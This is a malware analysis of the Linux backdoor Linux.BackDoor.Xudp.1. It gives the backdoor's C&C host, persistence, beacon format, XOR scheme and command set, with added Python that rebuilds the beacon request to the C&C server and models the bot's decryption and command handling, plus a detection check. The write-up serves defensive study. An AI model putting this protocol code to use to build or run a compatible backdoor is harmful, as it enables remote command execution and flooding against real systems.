SHA1
- 3a5f73d9beb74ee017965fa8922b2228fb684816
A backdoor for Linux that is installed by other downloader Trojans. The main module is placed in the /lib/ folder, and persistence is obtained through an entry in the cron scheduler. During installation the Trojan flushes the existing iptables rules.
Once launched, Linux.BackDoor.Xudp.1 decrypts configuration data hard-coded in the Trojan’s body that looks as follows:
dr0id1.xyz ; C&C server
transfer.php ; page to which requests are sent
XorUDP ; name of the backdoor, used as the User-Agent when generating requests
300 ; HTTP sleep time
5 ; keepalive sleep time
/bin/socket ; NewProcName
1 ; usemutex
700 ; low range UDP port
800 ; high range UDP port
Encrypted lines are stored and sent in the following form:
<length>:<encrypted value>
10:09Ц<о*.Йs
If the NewProcName parameter is set, the Trojan's process is hidden under the name given in the configuration (/bin/socket in this sample).
If the usemutex parameter is also non-zero, the Trojan locks the file /var/.mutexlock; if it cannot obtain the lock, it stops running.
The Trojan then generates a 128-byte key, selects a UDP port (the configuration supplies a low and a high port value), and starts three threads: HTTP_Thread, UDP_Listen, and UDP_KeepAlive.
HTTP_Thread
When this thread starts, the Trojan sends the generated key, its UDP port, and the backdoor's version to the server, and then periodically requests the following page from it:
template1 = "k=%s&p=%s&v=%s&s=1"
param1 = encodenum(ourKey)
param2 = encodenum(udpPort)
param3 = encodenum(version)
params = template1 % (param1, param2, param3)
request = "POST /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s"
actualRequest = request % (page, host, name, len(params), params)
The server replies with one of 4 messages:
First 2 bytes | Function |
---|---|
00 | Install client_key + client_port + client_ip |
01 | Execute a command |
02 | Reset client_key, client_port, client_ip |
03 | Terminate execution |
Every instruction is first decrypted with the key generated by the backdoor (ourKey); the resulting buffer is then decrypted again with client_key:
XOR(msg, len, ourKey);
XOR(msg, len, &client_key);
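The beacon and the two-pass XOR decryption described above, as an added Python example that is not code from the write-up or from the malware itself. The encoding behind encodenum(), the byte layout of the install payload, the ASCII form of the two-byte opcode, a zero-initialised client_key, and cyclic reuse of the 128-byte key are all assumptions; the server reply in the usage section is constructed:

```python
import os
import struct

# Values taken from the configuration in the write-up.
C2_HOST = "dr0id1.xyz"
C2_PAGE = "transfer.php"
USER_AGENT = "XorUDP"
KEY_LEN = 128                      # "generates a 128-byte key"
VERSION = "1"                      # ASSUMPTION: the write-up does not give the version string
OPCODES = {b"00": "install", b"01": "execute", b"02": "reset", b"03": "terminate"}


def xor_buf(msg, key):
    """XOR(msg, len, key). ASSUMPTION: the key is reused cyclically for messages
    longer than the key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(msg))


def encodenum(value):
    """The write-up names encodenum() but does not define it; hex is a stand-in."""
    if isinstance(value, int):
        value = str(value)
    if isinstance(value, str):
        value = value.encode()
    return value.hex()


def build_beacon(our_key, udp_port, version=VERSION):
    """The POST sent by HTTP_Thread, built from template1/request in the write-up."""
    params = "k=%s&p=%s&v=%s&s=1" % (encodenum(our_key), encodenum(udp_port), encodenum(version))
    request = ("POST /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               "Content-Length: %d\r\n\r\n%s") % (C2_PAGE, C2_HOST, USER_AGENT, len(params), params)
    return request.encode()


def is_xudp_beacon(raw_request):
    """Defender-side check for the beacon's static indicators (path, User-Agent, parameter names)."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    return (head.startswith(b"POST /" + C2_PAGE.encode() + b" HTTP/1.0")
            and b"User-Agent: " + USER_AGENT.encode() + b"\r\n" in head
            and body.startswith(b"k=") and b"&p=" in body
            and b"&v=" in body and body.endswith(b"&s=1"))


class XudpClient:
    """Bot-side state that the two XOR passes depend on."""

    def __init__(self, udp_port):
        self.our_key = os.urandom(KEY_LEN)
        self.udp_port = udp_port
        self.client_key = bytes(KEY_LEN)   # ASSUMPTION: all zeros until a type-00 reply installs one
        self.client_port = None
        self.client_ip = None
        self.alive = True

    def decrypt(self, blob):
        # First pass with the backdoor's own key, second with client_key, as in the write-up.
        # While client_key is still all zeros the second pass is a no-op.
        return xor_buf(xor_buf(blob, self.our_key), self.client_key)

    def handle_reply(self, blob):
        """Decrypt a server reply and apply the four message types from the table."""
        plain = self.decrypt(blob)
        op = OPCODES.get(plain[:2], "unknown")   # ASSUMPTION: opcode is the ASCII pair "00".."03"
        payload = plain[2:]
        if op == "install":
            # ASSUMPTION: layout key(128) | port (2 bytes, big-endian) | dotted-quad IP;
            # the write-up only says "client_key + client_port + client_ip".
            self.client_key = payload[:KEY_LEN]
            (self.client_port,) = struct.unpack("!H", payload[KEY_LEN:KEY_LEN + 2])
            self.client_ip = payload[KEY_LEN + 2:].decode()
        elif op == "reset":
            self.client_key, self.client_port, self.client_ip = bytes(KEY_LEN), None, None
        elif op == "terminate":
            self.alive = False
        return op, payload


if __name__ == "__main__":
    bot = XudpClient(udp_port=750)
    print(build_beacon(bot.our_key, bot.udp_port).decode())
    # Constructed reply: an install message encrypted with our_key only (client_key is still zero).
    reply = b"00" + bytes(range(KEY_LEN)) + struct.pack("!H", 4444) + b"203.0.113.7"
    print(bot.handle_reply(xor_buf(reply, bot.our_key))[0], bot.client_ip, bot.client_port)
```

The beacon travels over plain HTTP/1.0 and carries ourKey in the k= parameter, so whoever captures the first exchange can strip the first XOR pass; under the zero-initialised client_key assumption above, the same capture decrypts the install message and therefore yields client_key as well. The channel's confidentiality rests entirely on the traffic not being observed, which is also why the static indicators checked by is_xudp_beacon() are worth alerting on.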
UDP_Listen
Datagrams that do not come from client_ip are ignored, and nothing is processed while client_key is not set. An incoming UDP message is decrypted and has the following layout:
<handler>:<msg_id> <command>
Field | Function |
---|---|
handler | An 8-byte command identifier |
msg_id | Message ID. Every msg_id received is stored, and a command is executed only if its msg_id has not been seen before, so a repeated datagram is not executed twice. |
command | An arbitrary string carrying the command's argument |
The backdoor can execute the following commands:
- Start a flood (repeatedly sending requests to a target host)
- Stop the flood
- Run a received command with the system() function
- Run a received string with popen() and return the command's output
- Open a listening UDP socket and log every request to that port to a specified file in the format <ipaddr> <size> <List Port>
- Send the specified file in chunks of a given size at a given time interval
- Scan a specified range of IP addresses
- Send the list of msg_ids lower than the current message's that have not been processed
- Mark the sent msg_ids as processed
- Terminate execution
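The UDP_Listen bookkeeping described above (the source filter, the msg_id replay suppression, and the two msg_id housekeeping commands), as an added Python model that is neither the write-up's nor the malware's code. It takes the already-decrypted datagram because the write-up does not specify the UDP cipher; the 8-byte handler values, decimal msg_ids starting at 1, and the reading of "not processed" as "never received and not yet marked" are assumptions, and commands are reported rather than executed:

```python
import re

# Hypothetical 8-byte handler identifiers; the write-up gives the length but not the values.
H_SYSTEM = "SYSTEMCM"        # "run a received command with the system() function"
H_LIST_MISSING = "LISTMISS"  # "send the list of msg_ids lower than the current one not yet processed"
H_MARK_DONE = "MARKDONE"     # "mark the sent msg_ids as processed"
H_TERMINATE = "TERMINAT"     # "terminate execution"

# <handler>:<msg_id> <command>; ASSUMPTION: msg_id is written in decimal.
DATAGRAM_RE = re.compile(r"^(?P<handler>.{8}):(?P<msg_id>\d+) ?(?P<command>.*)$", re.S)


class UdpListenState:
    def __init__(self, client_ip, client_key):
        self.client_ip = client_ip
        self.client_key = client_key   # empty until the HTTP channel installs one
        self.seen = set()              # every msg_id ever received
        self.processed = set()         # msg_ids the C&C has marked as processed
        self.running = True

    def handle(self, src_ip, plaintext):
        """Return what the bot would do with one decrypted datagram (nothing is executed)."""
        if src_ip != self.client_ip:
            return ("ignored", "not from client_ip")
        if not self.client_key:
            return ("ignored", "client_key not set")
        m = DATAGRAM_RE.match(plaintext)
        if not m:
            return ("ignored", "malformed")
        handler, msg_id, command = m.group("handler"), int(m.group("msg_id")), m.group("command")
        if msg_id in self.seen:
            return ("ignored", "replayed msg_id %d" % msg_id)
        self.seen.add(msg_id)
        if handler == H_LIST_MISSING:
            return ("send_list", self.unprocessed_below(msg_id))
        if handler == H_MARK_DONE:
            ids = {int(x) for x in command.split()}
            self.processed |= ids
            return ("marked", sorted(ids))
        if handler == H_SYSTEM:
            return ("system", command)          # would be handed to system()
        if handler == H_TERMINATE:
            self.running = False
            return ("terminate", None)
        return ("unknown_handler", handler)

    def unprocessed_below(self, msg_id):
        # ASSUMPTION: ids start at 1; "not processed" = never received and not marked processed,
        # which lets the C&C resend datagrams that were lost on the way.
        return [i for i in range(1, msg_id) if i not in self.seen and i not in self.processed]


if __name__ == "__main__":
    bot = UdpListenState(client_ip="203.0.113.5", client_key=b"installed-key")
    # Constructed datagrams exercising the filter, the replay check and the housekeeping commands.
    for src, dgram in [("198.51.100.9", "SYSTEMCM:1 id"),      # wrong source, dropped
                       ("203.0.113.5", "SYSTEMCM:1 id"),
                       ("203.0.113.5", "SYSTEMCM:1 id"),       # replay, dropped
                       ("203.0.113.5", "SYSTEMCM:3 uname -a"),
                       ("203.0.113.5", "LISTMISS:5"),
                       ("203.0.113.5", "MARKDONE:6 2 4"),
                       ("203.0.113.5", "LISTMISS:8")]:
        print(dgram, "->", bot.handle(src, dgram))
```

The msg_id set only ever grows, so the replay check is strict but the dedup state is unbounded; the "list unprocessed" and "mark processed" pair is what lets the operator recover from lost datagrams without the bot re-running a command it already executed.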
UDP_KeepAlive
At the keepalive interval from the configuration, the malware sends a fixed datagram to the server to signal that it is still active.